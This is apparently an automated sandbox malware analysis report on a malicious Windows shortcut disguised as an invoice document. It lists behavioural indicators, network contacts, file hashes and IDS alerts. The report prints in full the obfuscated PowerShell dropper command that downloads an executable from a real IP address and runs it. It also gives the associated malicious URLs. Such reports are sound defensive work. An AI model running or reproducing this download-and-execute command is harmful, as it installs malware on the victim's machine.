Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'inv2.doc.lnk'

malicious

Threat Score: 100/100 AV Detection: 43% Labeled as: Susp.lnk

inv2.doc.lnk

This report is generated from a file or URL submitted to this webservice on November 16th 2016 11:48:39 (UTC) and action script Heavy Anti-Evasion
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v5.40 © Hybrid Analysis

Overview Sample unavailable Re-analyze Hash Seen Before Show Similar Samples Report False-Positive Request Report Deletion

Incident Response

Risk Assessment

Persistence: Injects into explorer
Fingerprint: Reads the active computer name
Reads the cryptographic machine GUID
Reads the windows installation date
Network Behavior: Contacts 1 domain and 1 host. View all details

Indicators

Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.

Malicious Indicators 9
External Systems
- Detected Emerging Threats Alert
  
  details
  
  Detected alert "ET INFO Executable Download from dotted-quad Host" (SID: 2016141, Rev: 4, Severity: 1) categorized as "A Network Trojan was detected"
  Detected alert "ET POLICY PE EXE or DLL Windows file download HTTP" (SID: 2018959, Rev: 2, Severity: 1) categorized as "Potential Corporate Privacy Violation"
  
  source
  
  Suricata Alerts
  
  relevance
  
  10/10
- Sample was identified as malicious by at least one Antivirus engine
  
  details
  
  2/54 Antivirus vendors marked sample as malicious (3% detection rate)
  
  source
  
  External System
  
  relevance
  
  8/10
General
- Contains ability to start/interact with device drivers
  
  details
  
  DeviceIoControl@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  8/10
- The analysis extracted a file that was identified as malicious
  
  details
  
  1/80 Antivirus vendors marked dropped file "System.dll" as malicious (classified as "W32.eHeur" with 1% detection rate)
  13/57 Antivirus vendors marked dropped file "Roaming.exE" as malicious (classified as "virus.win32.sality" with 22% detection rate)
  
  source
  
  Extracted File
  
  relevance
  
  10/10
Installation/Persistance
- Injects into explorer
  
  details
  
  Injected into "explorer.exe" (Show Process)
  
  source
  
  Monitored Target
  
  relevance
  
  5/10
Network Related
- Malicious artifacts seen in the context of a contacted host
  
  details
  
  Found malicious artifacts related to "46.30.43.107" (ASN: 35415, Owner: Webazilla B.V.): ...
  URL: http://46.30.43.107/gite.exe (AV positives: 8/68 scanned on 11/16/2016 08:13:36)
  URL: http://46.30.43.107/ (AV positives: 5/68 scanned on 11/15/2016 21:13:26)
  URL: http://46.30.43.107/gite.exe%20HTTP/1.1 (AV positives: 5/68 scanned on 11/15/2016 20:38:35)
  URL: http://46.30.43.107/faf.hasa (AV positives: 11/68 scanned on 11/09/2016 17:50:45)
  URL: http://46.30.43.107/gi2.exe (AV positives: 7/68 scanned on 11/04/2016 03:27:32)
  File SHA256: 2586f39b57bd74439b539abe51b686389526047c806f059413602767f98d864d (AV positives: 7/57 scanned on 11/16/2016 08:13:41)
  File SHA256: 77aba6a5271267758116b508d6d2432278fa634f41f55cf3dfb6a66fd54d4074 (AV positives: 10/57 scanned on 11/15/2016 23:06:02)
  File SHA256: 76fbbdd811bc0c3bd9260edf7b532857c47b95d432ab8bc52ebe57e1a7acd56d (AV positives: 1/53 scanned on 11/15/2016 20:38:39)
  File SHA256: 74ea1a8baa20e22e4e485cab4900ec34eb94a267e31b3499c29f700fc9751468 (AV positives: 19/56 scanned on 11/15/2016 10:07:40)
  File SHA256: efd9a49ccf1fa77ed5b5cd077b4bb3d62a6a0e0cc5c0accbcc6e74b70cbcf0a5 (AV positives: 8/56 scanned on 11/14/2016 09:55:30)
  
  source
  
  Network Traffic
  
  relevance
  
  10/10
Unusual Characteristics
- Contains ability to reboot/shutdown the operating system
  
  details
  
  ExitWindowsEx@USER32.DLL from exE (PID: 3592) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  5/10
- Contains native function calls
  
  details
  
  NtFsControlFile@NTDLL.DLL from cmd.exe (PID: 3804) (Show Stream)
  NtQueryInformationProcess@NTDLL.DLL from cmd.exe (PID: 3804) (Show Stream)
  NtOpenThreadToken@NTDLL.DLL from cmd.exe (PID: 3804) (Show Stream)
  NtQueryInformationToken@NTDLL.DLL from cmd.exe (PID: 3804) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  5/10
Hiding 1 Malicious Indicators
- All indicators are available only in the private webservice or standalone version

Suspicious Indicators 16
Anti-Detection/Stealthyness
- Queries kernel debugger information
  
  details
  
  "exE" at 00022258-00003592-00000105-53501164
  
  source
  
  API Call
  
  relevance
  
  6/10
- Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
  
  details
  
  "explorer.exe" (Access type: "QUERYVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "DISABLECACHINGOFSSLPAGES"; Value: "00000000040000000400000000000000")
  
  source
  
  Registry Access
  
  relevance
  
  3/10
Environment Awareness
- Reads the cryptographic machine GUID
  
  details
  
  "powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
  "explorer.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
- Reads the windows installation date
  
  details
  
  "powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION"; Key: "INSTALLDATE")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
External Systems
- Detected Emerging Threats Alert
  
  details
  
  Detected alert "ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download" (SID: 2016538, Rev: 3, Severity: 2) categorized as "Potentially Bad Traffic"
  Detected alert "ET INFO SUSPICIOUS Dotted Quad Host MZ Response" (SID: 2021076, Rev: 2, Severity: 2) categorized as "Potentially Bad Traffic"
  
  source
  
  Suricata Alerts
  
  relevance
  
  10/10
General
- Reads configuration files
  
  details
  
  "exE" read file "%USERPROFILE%\Users\PSPUBWS\Desktop\desktop.ini"
  "exE" read file "%USERPROFILE%\Searches\desktop.ini"
  "exE" read file "%USERPROFILE%\Videos\desktop.ini"
  "exE" read file "%USERPROFILE%\Pictures\desktop.ini"
  "exE" read file "%USERPROFILE%\Contacts\desktop.ini"
  "exE" read file "%USERPROFILE%\Favorites\desktop.ini"
  "exE" read file "%USERPROFILE%\Music\desktop.ini"
  "exE" read file "%USERPROFILE%\Downloads\desktop.ini"
  "exE" read file "%USERPROFILE%\Documents\desktop.ini"
  
  source
  
  API Call
  
  relevance
  
  4/10
Installation/Persistance
- Drops executable files
  
  details
  
  "System.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
  "Roaming.exE" has type "PE32 executable (GUI) Intel 80386 for MS Windows Nullsoft Installer self-extracting archive"
  
  source
  
  Extracted File
  
  relevance
  
  10/10
- Writes a PE file header to disc
  
  details
  
  "exE" wrote 11776 bytes starting with PE header signature to file "%TEMP%\nsf7D51.tmp\System.dll": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000e00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...
  
  source
  
  API Call
  
  relevance
  
  10/10
Network Related
- Found potential IP address in binary/memory
  
  details
  
  Heuristic match: "exEcUtIonPolICy bYpaSS -NoPrOFILe (NEW-objEcT systeM.NET.wEBclIEnT).DoWnLOadFile('http://46.30.43.107/gite.exe','%APPDATA%\exE');sTArt-PRoceSs %APPDATA%\exE"
  Heuristic match: "P^o^W^er^Sh^e^ll.^exe -exEc^UtIonP^o^lI^Cy bYpaS^S -^NoPrOF^ILe (^N^E^W-ob^jEcT systeM.NET.wEB^clIE^nT).DoWnLO^a^d^Fil^e^('http://46.30.43.107/gite.exe','%APPDATA%\exE')^;^s^TA^r^t^-P^R^o^c^eSs^ %APPDATA%\exE"
  "46.30.43.107"
  Heuristic match: "6.1.7601.17514"
  Heuristic match: "/c "P^o^W^er^Sh^e^ll.^exe -exEc^UtIonP^o^lI^Cy bYpaS^S -^NoPrOF^ILe (^N^E^W-ob^jEcT systeM.NET.wEB^clIE^nT).DoWnLO^a^d^Fil^e^('http://46.30.43.107/gite.exe','%APPDATA%\exE')^;^s^TA^r^t^-P^R^o^c^eSs^ %APPDATA%\exE""
  Heuristic match: "PoWerShell.exe -exEcUtIonPolICy bYpaSS -NoPrOFILe (NEW-objEcT systeM.NET.wEBclIEnT).DoWnLOadFile('http://46.30.43.107/gite.exe','%APPDATA%\exE');sTArt-PRoceSs %APPDATA%\exE"
  
  source
  
  String
  
  relevance
  
  3/10
Spyware/Information Retrieval
- Contains ability to open the clipboard
  
  details
  
  OpenClipboard@USER32.DLL from exE (PID: 3592) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  10/10
System Security
- Modifies proxy settings
  
  details
  
  "powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  "powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  "explorer.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
  "explorer.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
  "explorer.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
  "explorer.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  "explorer.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
- Queries sensitive IE security settings
  
  details
  
  "powershell.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
  "explorer.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
  
  source
  
  Registry Access
  
  relevance
  
  8/10
Unusual Characteristics
- Installs hooks/patches the running process
  
  details
  
  "powershell.exe" wrote bytes "0857967604789f760000000051c1c5759498c575ee9cc57575dcc775273ec775efb2cb750000000046ce5f77013d607738ed6077cfcd5f7731235f77de2f6077c4ca5f7780bb5f7752ba5f779fbb5f7792bb5f7746ba5f770abf5f7700000000" to virtual address "0x6F011000" (part of module "SHFOLDER.DLL")
  "powershell.exe" wrote bytes "f4f4ab70" to virtual address "0x6B1D1FDC" (part of module "MSCORWKS.DLL")
  "powershell.exe" wrote bytes "7739807779a88477be728477d62d84771de27f7705a28477c868837757d18a77bee37f77616f8477684182770050827700000000ad37e5758b2de575b641e57500000000" to virtual address "0x75371000" (part of module "WSHIP6.DLL")
  "powershell.exe" wrote bytes "92e67f7779a88477be728477d62d84771de27f7705a28477bee37f77616f8477684182770050827700000000ad37e5758b2de575b641e57500000000" to virtual address "0x74E51000" (part of module "WSHTCPIP.DLL")
  "powershell.exe" wrote bytes "4053827758588377186a8377653c84770000000000bf5f770000000056cc5f77000000007cca5f77000000003768b6756a2c8477d62d8477000000002069b6750000000029a65f7700000000a48db67500000000f70e5f7700000000" to virtual address "0x75D01000" (part of module "NSI.DLL")
  "exE" wrote bytes "4d376077f99c5f7778eb5e7718616177fa8b5e77d33360770e456077a41d6077d0d95f77e8d95f77013c6077e19c5f772b456077b62f607741235f7700bf5f77000000006d42747700000000ec227c7699e5797600000000" to virtual address "0x10003000" (part of module "SYSTEM.DLL")
  "exE" wrote bytes "0857967604789f760000000051c1c5759498c575ee9cc57575dcc775273ec775efb2cb750000000046ce5f77013d607738ed6077cfcd5f7731235f77de2f6077c4ca5f7780bb5f7752ba5f779fbb5f7792bb5f7746ba5f770abf5f7700000000" to virtual address "0x6F021000" (part of module "SHFOLDER.DLL")
  "exE" wrote bytes "c2000000" to virtual address "0x1000405C" (part of module "SYSTEM.DLL")
  
  source
  
  Hook Detection
  
  relevance
  
  10/10
- Reads information about supported languages
  
  details
  
  "cmd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
  
  source
  
  Registry Access
  
  relevance
  
  3/10
Hiding 2 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version

Informative 16
Anti-Reverse Engineering
- Contains ability to register a top-level exception handler (often used as anti-debugging trick)
  
  details
  
  SetUnhandledExceptionFilter@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  1/10
Environment Awareness
- Contains ability to query machine time
  
  details
  
  GetSystemTime@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  GetSystemTime@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  GetSystemTime@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  GetSystemTimeAsFileTime@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  GetLocalTime@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  1/10
- Contains ability to query the machine version
  
  details
  
  GetVersion@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  GetVersion@KERNEL32.DLL from exE (PID: 3592) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  1/10
- Contains ability to query volume size
  
  details
  
  GetDiskFreeSpaceExW@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  GetDiskFreeSpaceW@KERNEL32.DLL from exE (PID: 3592) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  3/10
- Makes a code branch decision directly after an API that is environment aware
  
  details
  
  Found API call GetLocalTime@KERNEL32.DLL (Target: "cmd.exe"; Stream UID: "00019473-00003804-28473-452-4A00C53D")
  which is directly followed by "cmp esi, ebx" and "jne 4A00C714h". See related instructions: "...
  +435 lea eax, dword ptr [ebp-00000264h]
  +441 push eax
  +442 call dword ptr [49FF1324h] ;GetLocalTime
  +448 lea eax, dword ptr [ebp-24h]
  +451 push eax
  +452 push edi
  +453 lea eax, dword ptr [ebp-00000264h]
  +459 push eax
  +460 cmp esi, ebx
  +462 jne 4A00C714h" ... from cmd.exe (PID: 3804) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  10/10
- Possibly tries to detect the presence of a debugger
  
  details
  
  GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  GetProcessHeap@KERNEL32.DLL from cmd.exe (PID: 3804) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  1/10
General
- Contacts domains
  
  details
  
  "wimel.at"
  
  source
  
  Network Traffic
  
  relevance
  
  1/10
- Contacts server
  
  details
  
  "46.30.43.107:80"
  
  source
  
  Network Traffic
  
  relevance
  
  1/10
- Contains PDB pathways
  
  details
  
  "cmd.pdb"
  
  source
  
  String
  
  relevance
  
  1/10
- Creates mutants
  
  details
  
  "\Sessions\1\BaseNamedObjects\RasPbFile"
  "\Sessions\1\BaseNamedObjects\Global\.net clr networking"
  "\Sessions\1\BaseNamedObjects\{C20CD437-BA6D-4ebb-B190-70B43DE3B0F3}"
  "\Sessions\1\BaseNamedObjects\_SHuassist.mtx"
  "\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
  "\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
  "\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
  "\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
  "\Sessions\1\BaseNamedObjects\Local\_!MSFTHISTORY!_"
  "\Sessions\1\BaseNamedObjects\Local\c:!users!pspubws!appdata!roaming!microsoft!windows!cookies!"
  "\Sessions\1\BaseNamedObjects\Local\c:!users!pspubws!appdata!local!microsoft!windows!history!history.ie5!"
  "\Sessions\1\BaseNamedObjects\Local\WininetStartupMutex"
  "\Sessions\1\BaseNamedObjects\Local\WininetConnectionMutex"
  "\Sessions\1\BaseNamedObjects\Local\WininetProxyRegistryMutex"
  "\Sessions\1\BaseNamedObjects\Local\c:!users!pspubws!appdata!local!microsoft!windows!temporary internet files!content.ie5!"
  
  source
  
  Created Mutant
  
  relevance
  
  3/10
- Drops files marked as clean
  
  details
  
  Antivirus vendors marked dropped file "unternehmen.jsp" as clean (type is "HTML document UTF-8 Unicode text with very long lines with CRLF LF line terminators")
  
  source
  
  Extracted File
  
  relevance
  
  10/10
- Loads the .NET runtime environment
  
  details
  
  "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll" at 6A6D0000
  
  source
  
  Loaded Module
- Spawns new processes
  
  details
  
  Spawned process "powershell.exe" with commandline "PoWerShell.exe -exEcUtIonPolICy bYpaSS -NoPrOFILe (NEW-objEcT systeM.NET.wEBclIEnT).DoWnLOadFile('http://46.30.43.107/gite.exe','%APPDATA%\exE');sTArt-PRoceSs %APPDATA%\exE" (Show Process)
  Spawned process "exE" (Show Process)
  Spawned process "explorer.exe" (Show Process)
  
  source
  
  Monitored Target
  
  relevance
  
  3/10
Installation/Persistance
- Dropped files
  
  details
  
  "System.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
  "O2C5X4FOXJSAPSMSRUYH.temp" has type "data"
  "ext.default.css" has type "ASCII text"
  "unternehmen.jsp" has type "HTML document UTF-8 Unicode text with very long lines with CRLF LF line terminators"
  "Roaming.exE" has type "PE32 executable (GUI) Intel 80386 for MS Windows Nullsoft Installer self-extracting archive"
  "jquery.cycle2.tile.min.js" has type "ASCII text with very long lines with CRLF line terminators"
  "ie179663103.css" has type "ASCII text"
  "lang-en.js" has type "UTF-8 Unicode text"
  "DK6uDL.QaY5YZv" has type "data"
  
  source
  
  Extracted File
  
  relevance
  
  3/10
- Touches files in the Windows directory
  
  details
  
  "cmd.exe" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
  
  source
  
  API Call
  
  relevance
  
  7/10
Network Related
- Found potential URL in binary/memory
  
  details
  
  Pattern match: "http://46.30.43.107/gite.exe','%APPDATA%\exE"
  Pattern match: "http://www.asdesigning.com"
  Pattern match: "http://nsis.sf.net/NSIS_Error"
  Pattern match: "http://www.astemplates.com"
  Pattern match: "https://www.elo.com/wcm/unternehmen.jsp"
  Pattern match: "ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"
  Pattern match: "dev.visualwebsiteoptimizer.com/j.php?a='+account_id+'&u='+encodeURIComponent(d.URL)+'&r='+Math.random()"
  Pattern match: "http://www.elo.com"
  Pattern match: "http://partner.elo.com/referenzfinder.html"
  Pattern match: "https://partner.elo.com/elo-business-partner-finden.html"
  Pattern match: "http://elooffice.elo.com/kaufen/fachhaendler.html"
  Pattern match: "http://elooffice.elo.com/kaufen/distributoren.html"
  Pattern match: "http://partner.elo.com/kooperationspartner.html"
  Pattern match: "http://blog.elooffice.de"
  Pattern match: "http://elooffice.elo.com/service/downloadcenter.html"
  Pattern match: "https://elooffice.elo.com/service/schulungen.html"
  Pattern match: "http://elooffice.elo.com/testversion.html"
  Pattern match: "http://elo.com/wcm/de/unternehmen/kontakt"
  Pattern match: "static.etracker.com/code/e.js"
  
  source
  
  String
  
  relevance
  
  10/10

File Details

All Details:

inv2.doc.lnk

Filename: inv2.doc.lnk
Size: 2.6KiB (2663 bytes)
Type: lnk
Description: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon, Archive, ctime=Sat Nov 20 21:29:12 2010, mtime=Sat Nov 20 21:29:12 2010, atime=Sat Nov 20 21:29:12 2010, length=302592, window=hidenormalshowminimized
Architecture
: WINDOWS
SHA256
: 42afe1bfcf2ec48aa2fb293b637d8df2033504ec98fe5944167187f19899ddb4
MD5
: 9d651569af586ad148be2df875acd0b7
SHA1
: c454487e8765e4d8ccc463f8053d08a68cf8f812

Resources

Icon

Visualization

Input File (PortEx)

Classification (TrID)

100.0% (.LNK) Windows Shortcut

Screenshots

Loading content, please wait...

Hybrid Analysis

Tip: Click an analysed process below to view more details.

Analysed 4 processes in total (System Resource Monitor).

cmd.exe /c "P^o^W^er^Sh^e^ll.^exe -exEc^UtIonP^o^lI^Cy bYpaS^S -^NoPrOF^ILe (^N^E^W-ob^jEcT systeM.NET.wEB^clIE^nT).DoWnLO^a^d^Fil^e^('http://46.30.43.107/gite.exe','%APPDATA%\exE')^;^s^TA^r^t^-P^R^o^c^eSs^ %APPDATA%\exE" (PID: 3804)
- powershell.exe PoWerShell.exe -exEcUtIonPolICy bYpaSS -NoPrOFILe (NEW-objEcT systeM.NET.wEBclIEnT).DoWnLOadFile('http://46.30.43.107/gite.exe','%APPDATA%\exE');sTArt-PRoceSs %APPDATA%\exE (PID: 2612)
  - exE (PID: 3592)
    - explorer.exe (PID: 3276)

Logged Script Calls	Logged Stdout	Extracted Streams	Memory Dumps
Reduced Monitoring	Network Activityy	Network Error	Multiscan Match

Network Analysis

DNS Requests

Domain	Address	Registrar	Country
wimel.at	-	-	-

Contacted Hosts

IP Address

Port/Protocol

Associated Process

Details

46.30.43.107

Associated Artifacts for 46.30.43.107

Details	Associated URL	Threat Level	Positives	Scan Date	Reference
Associated URL http://46.30.43.107/gite.exe Threat Level malicious Positives 8/68 Scan Date 11/16/2016 08:13:36 Reference -	http://46.30.43.107/gite.exe	malicious	8/68	11/16/2016 08:13:36	-
Associated URL http://46.30.43.107/ Threat Level malicious Positives 5/68 Scan Date 11/15/2016 21:13:26 Reference -	http://46.30.43.107/	malicious	5/68	11/15/2016 21:13:26	-
Associated URL http://46.30.43.107/gite.exe%20HTTP/1.1 Threat Level malicious Positives 5/68 Scan Date 11/15/2016 20:38:35 Reference -	http://46.30.43.107/gite.exe%20HTTP/1.1	malicious	5/68	11/15/2016 20:38:35	-
Associated URL http://46.30.43.107/faf.hasa Threat Level malicious Positives 11/68 Scan Date 11/09/2016 17:50:45 Reference -	http://46.30.43.107/faf.hasa	malicious	11/68	11/09/2016 17:50:45	-
Associated URL http://46.30.43.107/gi2.exe Threat Level malicious Positives 7/68 Scan Date 11/04/2016 03:27:32 Reference -	http://46.30.43.107/gi2.exe	malicious	7/68	11/04/2016 03:27:32	-

Details	Associated SHA256	Threat Level	Positives	Scan Date	Reference
Associated SHA256 2586f39b57bd74439b539abe51b686389526047c806f059413602767f98d864d Threat Level malicious Positives 7/57 Scan Date 11/16/2016 08:13:41 Reference VirusTotal	2586f39b57bd74439b539abe51b686389526047c806f059413602767f98d864d	malicious	7/57	11/16/2016 08:13:41	VirusTotal
Associated SHA256 77aba6a5271267758116b508d6d2432278fa634f41f55cf3dfb6a66fd54d4074 Threat Level malicious Positives 10/57 Scan Date 11/15/2016 23:06:02 Reference VirusTotal	77aba6a5271267758116b508d6d2432278fa634f41f55cf3dfb6a66fd54d4074	malicious	10/57	11/15/2016 23:06:02	VirusTotal
Associated SHA256 76fbbdd811bc0c3bd9260edf7b532857c47b95d432ab8bc52ebe57e1a7acd56d Threat Level suspicious Positives 1/53 Scan Date 11/15/2016 20:38:39 Reference VirusTotal	76fbbdd811bc0c3bd9260edf7b532857c47b95d432ab8bc52ebe57e1a7acd56d	suspicious	1/53	11/15/2016 20:38:39	VirusTotal
Associated SHA256 74ea1a8baa20e22e4e485cab4900ec34eb94a267e31b3499c29f700fc9751468 Threat Level malicious Positives 19/56 Scan Date 11/15/2016 10:07:40 Reference VirusTotal	74ea1a8baa20e22e4e485cab4900ec34eb94a267e31b3499c29f700fc9751468	malicious	19/56	11/15/2016 10:07:40	VirusTotal
Associated SHA256 efd9a49ccf1fa77ed5b5cd077b4bb3d62a6a0e0cc5c0accbcc6e74b70cbcf0a5 Threat Level malicious Positives 8/56 Scan Date 11/14/2016 09:55:30 Reference VirusTotal	efd9a49ccf1fa77ed5b5cd077b4bb3d62a6a0e0cc5c0accbcc6e74b70cbcf0a5	malicious	8/56	11/14/2016 09:55:30	VirusTotal

Details	Domain	Threat Level	Positives	Last Resolved	Reference
Domain asd.worldaxisgroup.com Threat Level - Positives - Last Resolved 09/29/2016 00:00:00 VirusTotal Report	asd.worldaxisgroup.com	-	-	09/29/2016 00:00:00	Report
Domain agrogame.ru Threat Level - Positives - Last Resolved 09/05/2016 00:00:00 VirusTotal Report	agrogame.ru	-	-	09/05/2016 00:00:00	Report
Domain sa.xficient.com Threat Level - Positives - Last Resolved 07/18/2016 00:00:00 VirusTotal Report	sa.xficient.com	-	-	07/18/2016 00:00:00	Report
Domain sa.yachtpulse.com Threat Level - Positives - Last Resolved 07/18/2016 00:00:00 VirusTotal Report	sa.yachtpulse.com	-	-	07/18/2016 00:00:00	Report
Domain sa.yosefs.com Threat Level - Positives - Last Resolved 07/18/2016 00:00:00 VirusTotal Report	sa.yosefs.com	-	-	07/18/2016 00:00:00	Report

TCP

powershell.exe
PID: 2612

Russian Federation
ASN: 35415 (Webazilla B.V.)

Contacted Countries

HTTP Traffic

Endpoint	Request	URL	Data
46.30.43.107:80	GET	46.30.43.107/gite.exe	GET /gite.exe HTTP/1.1 Host: 46.30.43.107 Connection: Keep-Alive

Memory Forensics

String	Context	Stream UID
http://46.30.43.107/gite.exe','c	Domain/IP reference	00019473-00003804-28473-125-49FF4C09

Suricata Alerts

Event	Category	Description	SID
local -> 46.30.43.107:80 (TCP)	A Network Trojan was detected	ET INFO Executable Download from dotted-quad Host	2016141
46.30.43.107 -> local:57235 (TCP)	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP	2018959
46.30.43.107 -> local:57235 (TCP)	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	2016538
46.30.43.107 -> local:57235 (TCP)	Potentially Bad Traffic	ET INFO SUSPICIOUS Dotted Quad Host MZ Response	2021076

ET rules applied using Suricata. Find out more about proofpoint ET Intelligence here.

Extracted Strings

Download All Memory Strings (7.4KiB)

!This program cannot be run in DOS mode.$

Ansi based on Dropped File (Roaming.exE.1622950302)

"http://www.w3.org/TR/html4/loose.dtd">

Ansi based on Dropped File (unternehmen.jsp)

#as-menu

Ansi based on Dropped File (ext.default.css)

#as-menu .as-menu

Ansi based on Dropped File (ext.default.css)

#as-menu .as-menu *

Ansi based on Dropped File (ext.default.css)

#as-menu .as-menu,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li > a,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li > a:hover > span,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li > a:hover,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li > span

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li > span:hover

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li > span:hover > span

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li.active > a,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li.active > span,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li.asHover > a,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li.asHover > span,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li.current > a,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li.current > span

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li.deeper > a

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li.deeper > a:after

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li.firstItem,

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li:first-child

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu > li:hover

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu a

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li

Ansi based on Dropped File (ext.default.css)

#as-menu ul.as-menu li li li.asHover ul

